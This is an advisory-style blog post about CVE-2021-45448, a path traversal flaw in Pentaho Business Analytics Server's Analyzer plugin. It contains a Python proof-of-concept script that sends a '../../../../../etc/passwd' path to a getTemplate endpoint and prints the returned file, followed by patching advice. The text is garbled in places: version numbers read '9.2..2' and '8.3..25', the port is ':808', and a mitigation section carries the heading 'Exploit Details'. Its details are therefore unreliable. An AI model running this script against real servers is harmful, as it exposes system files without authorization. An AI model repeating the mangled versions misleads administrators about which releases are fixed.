If you use Pentaho Business Analytics Server versions before 9.2..2 and 8.3..25 with the Pentaho Analyzer plugin, you may be vulnerable to a security issue known as a path traversal attack. This vulnerability allows an attacker to access files and directories outside the restricted area by manipulating the software's input for a pathname to identify resources.

Vulnerability Details

The Pentaho Business Analytics Server is exposed to a path traversal vulnerability when using the Analyzer plugin. The software constructs a pathname using external input but does not properly neutralize elements within the pathname, such as ".." and "/" separators. As a result, an attacker can exploit this vulnerability to access files and directories elsewhere on the system.

The following code snippet demonstrates a possible exploitation of this vulnerability

import requests

PENTAHO_URL = "http://your-pentaho-server-url:808";
TEMPLATE_PATH = "../../../../../etc/passwd"

payload = {'_PENTAHO_Analyzer_template-path': TEMPLATE_PATH}
response = requests.post(PENTAHO_URL + "/pentaho/api/analyzer/getTemplate", data=payload)

if response.status_code == 200:
    print("Vulnerable to CVE-2021-45448")
    print("Extracted file content:")
    print(response.text)
else:
    print("Not vulnerable to CVE-2021-45448")

This script sends a POST request to the getTemplate endpoint with a payload containing the path to the targeted file. In this example, the "/etc/passwd" file is used to check a Unix-based system's users.

Original References

1. The recent release notes for Pentaho Business Analytics Server mention fixes for CVE-2021-45448: Release Notes
2. Details about the CVE-2021-45448 vulnerability are available on the official NIST database: NIST CVE-2021-45448

Exploit Details

To prevent this vulnerability from being exploited, it's recommended to update Pentaho Business Analytics Server to the latest version.

Update to version 8.3..25 or higher.

In addition to updating the software, users should also disable any unnecessary plugins and remove/disable any API endpoints that are not being used.

Conclusion

CVE-2021-45448 is a critical security vulnerability, and users are advised to take action to keep their data and systems secure. By updating your Pentaho Business Analytics Server installation to the recommended versions and taking precautionary measures, such as disabling unused plugins and endpoints, you can protect your system from this path traversal vulnerability.

Timeline

Published on: 11/02/2022 16:15:00 UTC
Last modified on: 11/04/2022 02:48:00 UTC